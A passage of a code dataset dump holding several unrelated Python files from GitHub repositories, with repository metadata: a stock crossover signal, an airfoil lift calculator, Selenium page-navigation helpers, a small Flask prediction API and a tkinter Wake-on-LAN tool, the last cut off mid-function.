self._is_crossover_below_to_above(prev_long_term_ma, prev_short_term_ma,\n long_term_ma, short_term_ma):\n return StockSignal.sell\n\n return StockSignal.neutral\n","repo_name":"syurskyi/Python_Topics","sub_path":"115_testing/examples/Test-Driven Python Development/Chapter 3/test_driven_python-chapter-3/test_driven_python-chapter-3/stock_alerter/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} 
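A minimal usage sketch for the Stock class above. The import path mirrors the record's sub_path and is an assumption, as are the made-up dates and prices; with both moving-average windows filled by a steady uptrend, no short/long crossover occurs, so the signal stays neutral.

from datetime import datetime, timedelta

# Hypothetical import, assuming the stock_alerter package from the record's sub_path is importable.
from stock_alerter.stock import Stock, StockSignal

stock = Stock("GOOG")
start = datetime(2014, 2, 1)
# Eleven consecutive closing prices, enough to fill the 10-day and 5-day windows.
for day, price in enumerate([5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]):
    stock.update(start + timedelta(days=day), price)

assert stock.is_increasing_trend()
# A monotone uptrend keeps the short MA above the long MA on both days, so no crossover fires.
assert stock.get_crossover_signal(start + timedelta(days=10)) == StockSignal.neutral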
+{"seq_id":"11880023136","text":"import random\nimport ntpath\n\nimport string\nimport re\n\nimport config\n##\n# Random Generator\n# --------------------------\n# id_generator()\n# >>> 'G5G74W'\n#\n# id_generator(3, \"6793YUIO\")\n# >>>'Y3U'\n##\n\n\ndef id_generator(size=10, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\n# #\n# Extract Images From Text\n# Changes Name in main\n\n\ndef extract_link_from_text(text_with_image, web_safe_topic, new_name):\n image_string = \"\"\n images = re.findall(r\"\\/images\\/.*?JPG\", text_with_image, re.MULTILINE)\n images += re.findall(r\"\\/images\\/.*?jpg\", text_with_image, re.MULTILINE)\n images += re.findall(r\"\\/images\\/.*?PNG\", text_with_image, re.MULTILINE)\n images += re.findall(r\"\\/images\\/.*?png\", text_with_image, re.MULTILINE)\n\n img_count = 0\n\n web_safe_topic = web_safe_topic + \"/\"\n\n for j in images:\n img_count += 1\n\n new_dir_name = ntpath.dirname(j) + \"/\"\n new_dir_name = new_dir_name.replace(\"solution-image/\", \"\")\n new_dir_name = new_dir_name.replace(web_safe_topic, \"\")\n new_dir_name = new_dir_name.replace(config.IMAGE_LINK_OLD, config.IMAGE_LINK_NEW)\n \n new_file_name = \"{0}-{1}.png\".format(web_safe_topic + new_name, img_count)\n new_file_path = new_dir_name + new_file_name\n \n text_with_image = text_with_image.replace(j, new_file_path)\n image_string = image_string + j + \":\" + new_file_path + \"|\"\n\n return (text_with_image, image_string)","repo_name":"icesiv/data_grab","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42742398516","text":"import pyperclip, re\r\nmail= re.compile(r'''(\r\n [a-zA-Z0-9._%+-]+\r\n @\r\n [a-zA-Z0-9.-]+\r\n (\\.[a-zA-Z]{2,4})\r\n )''',re.VERBOSE)\r\n\r\na = mail.search(r'biswasmayank0@gmailcom')\r\nprint(a.group())\r\n","repo_name":"MAYANK123-code/python","sub_path":"laptop.py","file_name":"laptop.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36584953462","text":"import glob\nimport math\nimport os\n\nclass Airfoil:\n \"\"\"create an Aifoil class that will handle the loading and basic processing\n of data associated with an airfoil at multiple angles of attack\n \n Methods associated with it are __init__, load_xy,load_alpha,calc_cl,stag_pt\n and __str__\n \"\"\"\n def __init__(self,inputdir):\n \"\"\"initilalize an instance of the Airfoil class\n \"\"\"\n if not os.path.exists(inputdir): #check if input direcotory exists\n raise RuntimeError(\"input directory does not exist\")\n #check if and files exist\n if glob.glob(inputdir + \"xy*\") == [] or \\\n glob.glob(inputdir + \"alpha*\") == []: \n raise RuntimeError(\"required data files cannot be found in the \\\n data directory\")\n #store the files for each angle of attack\n ang_files = glob.glob(inputdir + \"alpha*\")\n try:\n self.ang_dict = {float(ang_file[len(inputdir)+5:-4]):ang_file \\\n for ang_file in ang_files} #dict that maps angles to corr. 
files\n except ValueError:\n print(\"angle of attack needs to be a number\")\n self.inputdir = inputdir #store the input directory\n self.ang_att = sorted(self.ang_dict.keys()) #sort the angles \n self.panels = [] #initialize a list of panels\n self.chord = 0 #initialize chord length\n self.x_data = [] #initialize a list of x data\n self.y_data = [] #initialize a list of y data\n self.cp_dict = {} #intialize dict that maps angles to list of Cp values\n self.cl_dict = {} #intiailize dict that maps angles to cl values\n self.stag_dict = {} #initialize dict that maps angles to stag. points\n \n def load_xy(self):\n \"\"\"load the file, store the (x,y) data points,the chord length\n and the (delta_x,delta_y) for each panel\n \"\"\"\n inputdir = self.inputdir\n #catch error with file opening\n try:\n with open(inputdir + \"xy.dat\") as f:\n xy_list = f.readlines()\n except IOError:\n print(\"cannot open the file\")\n del(xy_list[0]) #delete the header \n len_xy = len(xy_list)\n #delete the newline character and store as (x,y) pair\n xy_list = [tuple(xy_list[j][:-1].split()) for j in range(len_xy)]\n x_data = []; y_data = []\n for x,y in xy_list:\n x_data.append(float(x))\n y_data.append(float(y)) \n chord = max(x_data) - min(x_data)\n xy_panels = [(x_data[j+1]-x_data[j],y_data[j+1]-y_data[j]) \\\n for j in range(len_xy) if j < len_xy-1] #definition of panels: (dx,dy)\n \n self.panels = xy_panels\n self.chord = chord\n self.x_data = x_data\n self.y_data = y_data\n \n def load_alpha(self):\n \"\"\"load each file and store Cp values for each\n \"\"\"\n for ang,ang_file in self.ang_dict.items():\n try:\n with open(ang_file) as f:\n cp_list = f.readlines()\n except IOError:\n print(\"cannot open the file\")\n del(cp_list[0]) #delete the header\n #delete the newline character\n cp_list = [float(cp[:-1]) for cp in cp_list]\n \n self.cp_dict[ang] = cp_list\n \n def calc_cl(self):\n \"\"\"calculate the lift coefficient for each angle of attack\n \"\"\"\n chord = self.chord\n for ang,cp_list in self.cp_dict.items():\n cp_len = len(cp_list)\n cx = 0; cy = 0; alpha = math.radians(ang)\n for j in range(cp_len):\n cp = cp_list[j]\n del_x = self.panels[j][0]; del_y = self.panels[j][1]\n #use the formulas for delta_cx and delta_cy\n del_cx = (-cp*del_y)/chord\n del_cy = (cp*del_x)/chord\n cx += del_cx; cy += del_cy\n cl = (cy*math.cos(alpha)) - (cx*math.sin(alpha)) #lift coefficient\n \n self.cl_dict[ang] = cl\n \n def stag_pt(self):\n \"\"\"identify the stagnation point for each angle of attack\n \"\"\"\n for ang,cp_list in self.cp_dict.items():\n stag_cp = max(cp_list) #stagnation point corresponds to max Cp\n panel_num = cp_list.index(stag_cp)\n x_dat = self.x_data; y_dat = self.y_data\n #stagnation point is defined as middle of \"stagnation panel\"\n stag_x = (x_dat[panel_num] + x_dat[panel_num+1])/2\n stag_y = (y_dat[panel_num] + y_dat[panel_num+1])/2\n \n self.stag_dict[ang] = [(stag_x,stag_y), stag_cp]\n \n def __str__(self):\n \"\"\"string representation of an instance of the class\n \"\"\"\n inputdir = self.inputdir\n \n #header\n print(\"Test case: {} {}\\n\".format(inputdir[:4].upper(),inputdir[4:-1]))\n print(\"{:^7}\".format(\"alpha\"),end = ' ')\n print(\"{:^9}\".format(\"cl\"),end = ' ')\n print(\"{:^30}\".format(\"stagnation point\"))\n \n print(\"{:^7}\".format(\"-\"*5),end = ' ')\n print(\"{:^9}\".format(\"-\"*7),end = ' ')\n print(\"{:^30}\".format(\"-\"*26))\n \n #method calls\n self.load_xy()\n self.load_alpha()\n self.calc_cl()\n self.stag_pt()\n \n #actual representation for each angle 
of attack with lots of formatting\n for ang in self.ang_att:\n cl = self.cl_dict[ang]\n stag_pt_x = self.stag_dict[ang][0][0]\n stag_pt_y = self.stag_dict[ang][0][1]\n stag_cp = self.stag_dict[ang][1]\n angle = float(ang)\n \n print(\"{:6.2f}\".format(angle),end = ' ')\n print(\"{:9.4f}\".format(cl),end = ' ')\n print(\" ({:5.4f},\".format(stag_pt_x),end = ' ')\n print(\"{:7.4f})\".format(stag_pt_y),end = ' ')\n print(\"{:6.4f}\".format(stag_cp))\n return(' ') #ensures no error is generated\n","repo_name":"EmmaAnif/cme211","sub_path":"hw3/airfoil.py","file_name":"airfoil.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70130432166","text":"from athenataf.lib.util.WebPage import WebPage \nfrom athenataf.lib.functionality.page.common.AllGroupPage import AllGroupPage\nfrom athenataf.lib.functionality.page.configuration.security.SecurityPage import SecurityPage\nfrom athenataf.lib.functionality.page.configuration.accessPoints.AccessPointsPage import AccessPointsPage\nfrom athenataf.lib.functionality.page.configuration.vpn.VpnPage import VpnPage\nfrom athenataf.lib.functionality.page.configuration.network.NetworkPage import NetworkPage\nfrom athenataf.lib.functionality.page.configuration.services.ServicesPage import ServicesPage\nfrom athenataf.lib.functionality.page.configuration.rf.RfPage import RfPage\nfrom athenataf.lib.functionality.page.configuration.dhcp.DhcpPage import DhcpPage\nfrom athenataf.lib.functionality.page.configuration.wids.WidsPage import WidsPage\nfrom athenataf.lib.functionality.page.configuration.system.SystemPage import SystemPage\nfrom athenataf.lib.functionality.page.maintenance.userManagement.UserManagementPage import UserManagementPage\nfrom athenataf.lib.functionality.page.maintenance.subscription_keys.SubscriptionKeysPage import SubscriptionKeysPage\nfrom athenataf.lib.functionality.page.maintenance.device_management.DeviceManagementPage import DeviceManagementPage\nfrom athenataf.lib.functionality.page.switch.PortsPage import PortsPage\nfrom athenataf.lib.functionality.page.switch.SwitchesPage import SwitchesPage\nfrom athenataf.lib.functionality.page.switch.SwitchVlansPage import SwitchVlansPage\nfrom athenataf.lib.functionality.page.switch.SwitchSystemPage import SwitchSystemPage\nfrom athenataf.lib.functionality.page.maintenance.FirmWarePage import FirmWarePage\nfrom athenataf.lib.functionality.page.reports.ReportsNetworkPage import ReportsNetworkPage\nfrom athenataf.lib.functionality.page.reports.ReportsSecurityPage import ReportsSecurityPage\nfrom athenataf.lib.functionality.page.reports.ReportsPciCompliancePage import ReportsPciCompliancePage\nfrom athenataf.lib.functionality.page.switch.SwitchDhcpPage import SwitchDhcpPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringPage import MonitoringPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringAccessPointPage import MonitoringAccessPointPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringSwitchesPage import MonitoringSwitchesPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringClientPage import MonitoringClientPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringWidsPage import MonitoringWidsPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringEventLogsPage import MonitoringEventLogsPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringNotificationPage import MonitoringNotificationPage\n\nimport time\n\nclass 
LeftPanel(WebPage):\n def __init__(self, test, browser, config):\n WebPage.__init__(self, \"DashboardLeftpanel\", test, browser, config)\n self.test.assertPageLoaded(self)\n\n def isPageLoaded(self):\n if self.monitoring:\n return True \n else:\n return False \n \n def goto_configuration_page(self):\n self.configuration.click()\n \n def go_to_configuration(self):\n self.configuration.click()\n self.buy_time()\n return AllGroupPage(self.test, self.browser, self.config)\n \n def go_to_security(self):\n time.sleep(4)\n self.security_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.security_menu.click()\n return SecurityPage(self.test, self.browser, self.config)\n\n def go_to_access_points(self):\n self.access_points_menu.click()\n self.buy_time()\n return AccessPointsPage(self.test, self.browser, self.config)\n \n def go_to_vpn(self):\n time.sleep(4)\n self.vpn_menu.click()\n time.sleep(4)\n self.vpn_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.vpn_menu.click()\n return VpnPage(self.test, self.browser, self.config)\n \n def go_to_network_page(self):\n self.configuration.click()\n return NetworkPage(self.test, self.browser, self.config)\n \n def go_to_services(self):\n time.sleep(4)\n self.services_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.services_menu.click() \n return ServicesPage(self.test, self.browser, self.config)\n\n def go_to_rf_page(self):\n time.sleep(4)\n time.sleep(7)\n self.rf_menu.click()\n time.sleep(7)\n self.rf_menu.click()\n return RfPage(self.test, self.browser, self.config)\n \n def go_to_dhcp_page(self):\n time.sleep(4)\n self.dhcp_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.dhcp_menu.click() \n return DhcpPage(self.test, self.browser, self.config)\n\n def goto_monitoringPage(self):\n self.monitoring.click()\n self.buy_time()\n return MonitoringPage(self.test, self.browser, self.config)\n\n def go_to_monitoring_access_page(self):\n self.monitoring_access_points.click()\n self.buy_time()\n return MonitoringAccessPointPage(self.test, self.browser, self.config)\n\n def go_to_monitoring_clients_page(self):\n self.monitoring_clients.click()\n self.buy_time()\n return MonitoringClientPage(self.test, self.browser, self.config)\n\n def goto_monitoring_notification_page(self):\n self.go_to_monitoring_page()\n self.monitoring_notifications.click()\n time.sleep(2)\n return MonitoringNotificationPage(self.test, self.browser, self.config)\n \n def go_to_monitoring_notification_page(self):\n self.monitoring_notifications.click()\n \n def go_to_monitoring_wids(self):\n self.buy_time()\n self.monitoring_wids.click()\n self.buy_time()\n return MonitoringWidsPage(self.test, self.browser, self.config)\n \n def go_to_wids_page(self):\n time.sleep(4)\n self.wids_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.wids_menu.click()\n return WidsPage(self.test, self.browser, self.config)\n\n def go_to_system_page(self):\n self.system_menu.click()\n\n return SystemPage(self.test, self.browser, self.config)\n \n def go_to_maintenance(self):\n self.maintenance.click()\n return FirmWarePage(self.test, self.browser, self.config)\n \n def go_to_user_management(self):\n time.sleep(5)\n self.maintenance.click()\n self.buy_time()\n self.user_management.click()\n self.buy_time()\n return UserManagementPage(self.test, self.browser, self.config)\n\n def go_to_monitoring_page(self):\n self.buy_time()\n self.monitoring.click()\n self.buy_time()\n return MonitoringPage(self.test, self.browser, 
self.config)\n\n    def go_to_monitoring_access_points(self):\n        self.monitoring_access_points.click()\n        self.buy_time()\n        return MonitoringAccessPointPage(self.test, self.browser, self.config)\n\n    def go_to_monitoring_event_log_page(self):\n        self.monitoring_event_log.click()\n        return MonitoringEventLogsPage(self.test, self.browser, self.config)\n\n    def go_to_monitoring_clients(self):\n        self.monitoring_clients.click()\n\n    def go_to_monitoring_event_log(self):\n        self.monitoring_event_log.click()\n\n    def go_to_monitoring_notifications(self):\n        self.monitoring_notifications.click()\n\n    def go_to_monitoring_wids_page(self):\n        self.monitoring_wids.click()\n        self.buy_time()\n        return MonitoringWidsPage(self.test, self.browser, self.config)\n\n    def buy_time(self):\n        time.sleep(8)\n\n    def assert_delta_config_icon(self):\n        import traceback\n        time.sleep(120)\n        self.slider_menu_icon.click()\n        if self.expand_plus_button:\n            self.expand_plus_button.click()\n        else:\n            if self.delta_config_icon:\n                raise AssertionError(\"Repeated delta config has occurred. Traceback: %s \" %traceback.format_exc())\n            self.slider_menu_icon.click()\n\n    def go_to_subscription_keys(self):\n        self.buy_time()\n        self.maintenance.click()\n        self.buy_time()\n        self.maintenance_subscription_keys.click()\n        self.buy_time()\n        return SubscriptionKeysPage(self.test, self.browser, self.config)\n\n    def go_to_device_management(self):\n        self.buy_time()\n        self.maintenance.click()\n        self.buy_time()\n        self.maintenance_device_management.click()\n        self.buy_time()\n        return DeviceManagementPage(self.test, self.browser, self.config)\n\n    def go_to_switch_configuration(self):\n        self.switch_configuration.click()\n        return AllGroupPage(self.test, self.browser, self.config)\n\n    def go_to_switch_configuration_ports(self):\n        self.buy_time()\n        self.switch_configuration.click()\n        self.buy_time()\n        self.ports.click()\n        self.buy_time()\n        return PortsPage(self.test, self.browser, self.config)\n\n    def go_to_switch_configuration_vlans(self):\n        self.buy_time()\n        self.switch_configuration.click()\n        self.buy_time()\n        self.vlans.click()\n        self.buy_time()\n        return SwitchVlansPage(self.test, self.browser, self.config)\n\n    def go_to_switch_configuration_system(self):\n        self.buy_time()\n        self.switch_configuration.click()\n        self.buy_time()\n        self.system.click()\n        self.buy_time()\n        return SwitchSystemPage(self.test, self.browser, self.config)\n\n    def go_to_reports(self):\n        self.reports.click()\n        return ReportsNetworkPage(self.test, self.browser, self.config)\n\n    def go_to_reports_network(self):\n        self.buy_time()\n        self.reports.click()\n        self.buy_time()\n        self.reports_network.click()\n        return ReportsNetworkPage(self.test, self.browser, self.config)\n\n    def go_to_reports_security(self):\n        self.buy_time()\n        self.reports.click()\n        self.buy_time()\n        self.reports_security.click()\n        return ReportsSecurityPage(self.test, self.browser, self.config)\n\n    def go_to_maintenance_Firmware_page(self):\n        self.maintenance.click()\n        self.buy_time()\n        self.maintenance_firmware.click()\n        
self.buy_time()\n        return FirmWarePage(self.test, self.browser, self.config)\n\n    def go_to_reports_pci_compliance(self):\n        self.buy_time()\n        self.reports.click()\n        self.buy_time()\n        self.reports_pci_compliance.click()\n        return ReportsPciCompliancePage(self.test, self.browser, self.config)\n\n    def go_to_switch_configuration_switch(self):\n        self.buy_time()\n        self.switch_configuration.click()\n        self.buy_time()\n        self.switches.click()\n        self.buy_time()\n        return SwitchesPage(self.test, self.browser, self.config)\n\n    def go_to_switch_configuration_dhcp_pools(self):\n        self.buy_time()\n        self.switch_configuration.click()\n        self.buy_time()\n        self.dhcp_pools.click()\n        self.buy_time()\n        return SwitchDhcpPage(self.test, self.browser, self.config)\n\n    def go_to_reports_page(self):\n        self.reports.click()\n\n    def go_to_monitoring_switches_page(self):\n        self.buy_time()\n        self.monitoring.click()\n        if self.SwitchesSubMenu:\n            self.SwitchesSubMenu.click()\n        return MonitoringSwitchesPage(self.test, self.browser, self.config)","repo_name":"cash2one/reautomation_handoff","sub_path":"athena_automation/athenataf/lib/functionality/page/common/LeftPanel.py","file_name":"LeftPanel.py","file_ext":"py","file_size_in_byte":12580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"13723170784","text":"class Name:\n    def __get__(self, instance, owner=None):\n        print(f'__get__, instance is {instance}, owner is {owner}')\n        return \"peter\"\n\nclass A:\n    name=Name()\n    # def __init__(self) -> None:\n    #     self.name=Name()\n\no=A()\n\n# print(A.name)\nName.__set__=lambda x,y,z:None\no.name=\"Bob\"\nprint(o.name)","repo_name":"minikiller/spider-project","sub_path":"des.py","file_name":"des.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"8027437421","text":"from flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom predykcja_meczy import predykacja_meczy_wynik\nfrom flask_cors import CORS\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/prediction/*\": {\"origins\": \"*\"}})\napi = Api(app)\n\nclass HelloWorld(Resource):\n    def get(self):\n        return {'about' : 'Hello World'}\n\n    def post(self):\n        some_json = request.get_json()\n        return {'you sent' : some_json}, 201\n\nclass Multi(Resource):\n    def get(self, num):\n        return {'result' : num*10}\n\nclass Prediction(Resource):\n    def get(self, data):\n        # a six-digit date arrives as an int, so restore a dropped leading zero\n        data = str(data)\n        if len(data) == 5:\n            data = '0'+data\n        a = data[0:2]\n        b = data[2:4]\n        c = data[4:]\n        data = a+'/'+b+'/'+c\n        return {'result' : predykacja_meczy_wynik(data)}\n\napi.add_resource(HelloWorld, '/')\napi.add_resource(Multi, '/multi/<int:num>')\napi.add_resource(Prediction, '/prediction/<int:data>')\n\nif __name__ == '__main__':\n    app.run(debug=False)\n","repo_name":"Sinon2025/NBA-Prediction-Web-Application","sub_path":"Prediction Server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"17888396290","text":"from wol import *\nfrom tkinter import *\nimport time\nimport pickle\nfrom tkinter import messagebox\nimport datetime\n\nclass WakeOnLanGraphical():\n\n\tdef __init__(self):\n\t\t\"\"\" Main window\"\"\"\n\n\t\tself.Ip = \"\"\n\t\tself.Mac = \"\"\n\t\tself.Port = \"\"\n\n\t\tself.ListLog = []\n\n\t\ttry:\n\t\t\tself.GetConf()\n\t\texcept:\n\t\t\tpass\n\n\t\ttry:\n\t\t\tself.GetLog()\n\t\texcept:\n\t\t\tpass\n\n\t\tself.window = Tk()\n\t\tself.window.title('Wake On Lan')\n\t\tself.window.geometry(\"350x400\")\n\t\tself.window.config(bg='white')\n\n\t\tself.window.iconbitmap(default='image/logo.ico')\n\n\t\t# Images\n\t\tself.image = PhotoImage(file=\"image/logo.png\")\n\t\tself.image_verte = PhotoImage(file='image/logo_vert2.png')\n\n\t\tself.canvas = Canvas(self.window, width=300, height=300, bg='white', bd=0, highlightthickness=0,)\n\t\tself.click = self.canvas.create_image(150, 150, image=self.image, state=NORMAL)\n\n\t\tself.canvas.tag_bind(self.click, \"<Button-1>\", self.WakeUpButton)\n\n\t\tself.canvas.pack()\n\n\t\t# Menu\n\t\tmenu_bar = Menu(self.window)\n\n\t\tmenu_bar.add_command(label='Configuration', command = self.ConfWol)\n\t\tmenu_bar.add_command(label='Log', command = self.Log)\n\t\tmenu_bar.add_command(label='About', command = self.About)\n\n\t\tself.window.config(menu=menu_bar)\n\n\t\tself.window.mainloop()\n\n\tdef Gif(self):\n\n\t\tNbrImage = 25\n\t\ti = 1\n\n\t\twhile i != NbrImage + 1:\n\n\t\t\timg = PhotoImage(file=\"image/gif/{}.png\".format(i))\n\n\t\t\tself.canvas.itemconfig(self.click, image=img)\n\t\t\tself.window.update()\n\t\t\ti += 1\n\n\tdef WakeUpButton(self, arg):\n\t\t\"\"\"Called when the wake-up button is clicked\"\"\"\n\n\t\tself.Gif()\n\t\ttime.sleep(0.2)\n\t\tself.canvas.itemconfig(self.click, image=self.image)\n\n\t\tCheck = self.CheckData(self.Ip, self.Mac, self.Port)\n\t\tprint('CheckData result: {}'.format(Check))\n\n\t\tif Check == True:\n\n\t\t\tprint('About to send: {}, {}, {}'.format(self.Ip, self.Mac, self.Port))\n\t\t\tWol(self.Ip, self.Mac, self.Port)\n\n\t\t\tself.AddLog(self.Ip, self.Mac, self.Port, True)\n\n\t\t\tprint('Magic packet sent')\n\n\t\telse:\n\n\t\t\tmessagebox.showinfo(\"Unable to send the packet\", \"Error {} : {}\".format(Check[1], Check[2]))\n\t\t\tprint(\"Unable to send the packet, please check the settings (Error {} : {})\".format(Check[1], Check[2]))\n\n\t\t\tself.AddLog(self.Ip, self.Mac, self.Port, False, [Check[1], Check[2]])\n\n\t\tprint(self.Ip, self.Mac, self.Port)\n\n\tdef CheckData(self, Ip, Mac='', Port=''):\n\n\t\tif Ip == '':\n\t\t\treturn [False, 1, 'IP address field is empty']\n\n\t\tif Mac == '':\n\t\t\treturn [False, 2, 'MAC address field is empty']\n\n\t\tif Port == '':\n\t\t\treturn [False, 3, 'Destination port field is empty']\n\n\t\telse:\n\t\t\t# Check IP\n\t\t\ttry:\n\t\t\t\tIpSplit = Ip.split('.')\n\n\t\t\t\tfor element in IpSplit:\n\t\t\t\t\tIpSplit[IpSplit.index(element)] = int(element)\n\n\t\t\t\tif len(IpSplit) != 4:\n\t\t\t\t\tIpCheck = False\n\t\t\t\telif IpSplit[0] > 254 or IpSplit[0] < 1:\n\t\t\t\t\tIpCheck = False\n\t\t\t\telif IpSplit[1] > 254 or IpSplit[1] < 1:\n\t\t\t\t\tIpCheck = False\n\t\t\t\telif IpSplit[2] > 254 or IpSplit[2] < 1:\n\t\t\t\t\tIpCheck = False\n\t\t\t\telif IpSplit[3] > 254 or IpSplit[3] < 1:\n\t\t\t\t\tIpCheck = False\n\t\t\t\telse:\n\t\t\t\t\tIpCheck = True\n\n\t\t\texcept:\n\t\t\t\tif '.' in Ip:\n\t\t\t\t\tIpCheck = True\n\t\t\t\telse:\n\t\t\t\t\tIpCheck = False\n\n\t\t\t# Check MAC\n\t\t\tAlphabet = ['A', 'B', 'C', 'D', 'E', 'F', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '-']\n\t\t\tCheckerMac = []\n\t\t\ttry:\n\t\t\t\tLenMac = len(Mac)\n\n\t\t\t\tif LenMac == 12 or LenMac == 17:\n\t\t\t\t\tfor element in Mac:\n\t\t\t\t\t\tif element.upper() in Alphabet:\n\t\t\t\t\t\t\tCheckerMac.append(True)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tCheckerMac.append(False)\n\n\t\t\t\t\tif False in CheckerMac:\n\t\t\t\t\t\tMacCheck = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tMacCheck = True\n\t\t\t\telse:\n\t\t\t\t\tMacCheck = False\n\n\t\t\texcept:\n\t\t\t\tMacCheck = False\n\n\t\t\t# Check Port\n\t\t\ttry:\n\t\t\t\tif int(Port) == 9 or int(Port) == 7:\n\t\t\t\t\tPortCheck = True\n\t\t\t\telse:\n\t\t\t\t\tPortCheck = False\n\t\t\texcept:\n\t\t\t\tPortCheck = False\n\n\t\t\tCheck = [IpCheck, MacCheck, PortCheck]\n\n\t\t\tif False in Check:\n\t\t\t\tError = Check.index(False)\n\n\t\t\t\t# Invalid IP\n\t\t\t\tif Error == 0:\n\t\t\t\t\treturn [False, 4, 'Invalid IP address']\n\n\t\t\t\t# Invalid MAC\n\t\t\t\tif Error == 1:\n\t\t\t\t\treturn [False, 5, 'Invalid MAC address']\n\n\t\t\t\t# Invalid port\n\t\t\t\tif Error == 2:\n\t\t\t\t\treturn [False, 6, 'Invalid port']\n\n\t\t\telse:\n\t\t\t\treturn True\n\n\tdef ConfWol(self):\n\t\t\"\"\"Called when the Configuration menu entry is clicked\"\"\"\n\n\t\tdef SaveParams(event=False):\n\t\t\t\"\"\" Save the configuration parameters\"\"\"\n\n\t\t\tself.Ip = IpEntry.get()\n\t\t\tself.Mac = MacEntry.get()\n\t\t\tself.Port = PortEntry.get()\n\n\t\t\tself.SetConf(self.Ip, self.Mac, self.Port)\n\n\t\t\tmain.destroy()\n\n\t\t\tprint(self.Ip, self.Mac, self.Port)\n\n\t\tdef Destroy(event=False):\n\n\t\t\tmain.destroy()\n\n\t\tmain = Tk()\n\t\tmain.title('Wake On Lan configuration')\n\t\tmain.geometry(\"230x230\")\n\t\tmain.config(bg='white')\n\n\t\tparametres = Frame(main, bg='white')\n\n\t\t# IP address\n\t\tIpText = Label(parametres, text=\"IP address:\", bg='white')\n\t\tIpText.grid(row=1, column=1)\n\n\t\tIpEntry = Entry(parametres)\n\t\tIpEntry.insert(END, self.Ip)\n\t\tIpEntry.grid(row=1, column=2)\n\n\t\t# MAC address\n\t\tMacText = Label(parametres, text=\"MAC address:\", bg='white')\n\t\tMacText.grid(row=2, column=1)\n\n\t\tMacEntry = Entry(parametres)\n\t\tMacEntry.insert(END, self.Mac)\n\t\tMacEntry.grid(row=2, column=2)\n\n\t\t# Port\n\t\tPortText = Label(parametres, text=\"Port:\", bg='white')\n\t\tPortText.grid(row=3, column=1)\n\n\t\tPortEntry = Entry(parametres)\n\t\tPortEntry.insert(END, self.Port)\n\t\tPortEntry.grid(row=3, column=2)\n\n\t\t# Keyboard shortcuts: Enter saves, Escape closes without saving\n\t\tmain.bind('<Return>', SaveParams)\n\t\tmain.bind('<Escape>', Destroy)\n\n\t\tparametres.pack()\n\n\t\t# Save button\n\t\tSubmitButton = Button(main, text='Save', command=SaveParams)\n\t\tSubmitButton.pack()\n\n\tdef GetConf(self):\n\n\t\twith open('data', 'rb') as Fichier:\n\t\t\tmon_depickler = pickle.Unpickler(Fichier)\n\t\t\tdata = mon_depickler.load()\n\n\t\tprint(\"Loaded from the data file: {}\".format(data))\n\n\t\tself.Ip = data[0]\n\t\tself.Mac = data[1]\n\t\tself.Port = data[2]\n\n\tdef SetConf(self, Ip, Mac, Port):\n\n\t\tconf = [Ip, Mac, Port]\n\n\t\twith open('data', 'wb') as Fichier:\n\t\t\tmon_pickle = pickle.Pickler(Fichier)\n\t\t\tmon_pickle.dump(conf)\n\n\tdef About(self):\n\n\t\tmain = Tk()\n\t\tmain.title('About')\n\t\tmain.geometry(\"300x300\")\n\t\tmain.config(bg='white')\n\n\t\tText = Label(main, text=\"Free software, created by Alban Cipre in 2020\")\n\t\tText.grid()\n\n\t\tVersion = Label(main, text=\"Version: 1\")\n\t\tVersion.grid()\n\n\t\tContact = Label(main, text=\"Contact: alban@cipre.com\")\n\t\tContact.grid()\n\n\tdef Log(self):\n\n\t\tmain = Tk()\n\t\tmain.title('Log')\n\t\tmain.geometry(\"300x300\")\n\t\tmain.config(bg='white')\n\n\t\tfor element in self.ListLog:\n\t\t\tText = Label(main, text=element)\n\t\t\tText.grid()\n\n\tdef AddLog(self, Ip, Mac, Port, state, CodeError=False):\n\n\t\theure = datetime.datetime.now()\n\n\t\tif state == True:\n\t\t\tself.ListLog.append([\"[{}/{}/{} {}:{}] : Packet sent: Ip : {}, Mac : {}, Port : {}\".format(heure.day, heure.month, heure.year, heure.hour, heure.minute, Ip, Mac, Port)])\n\t\telse:\n\t\t\tself.ListLog.append([\"[{}/{}/{} {}:{}] : Send attempt failed: Ip : {}, Mac : {}, Port : {} [Error : {} {}]\".format(heure.day, heure.month, heure.year, heure.hour, heure.minute, Ip, Mac, Port, CodeError[0], CodeError[1])])\n\n\t\tself.SetLog(self.ListLog)\n\n\tdef GetLog(self):\n\n\t\twith open('log', 'rb') as Fichier:\n\t\t\tmon_depickler = pickle.Unpickler(Fichier)\n\t\t\tdata = 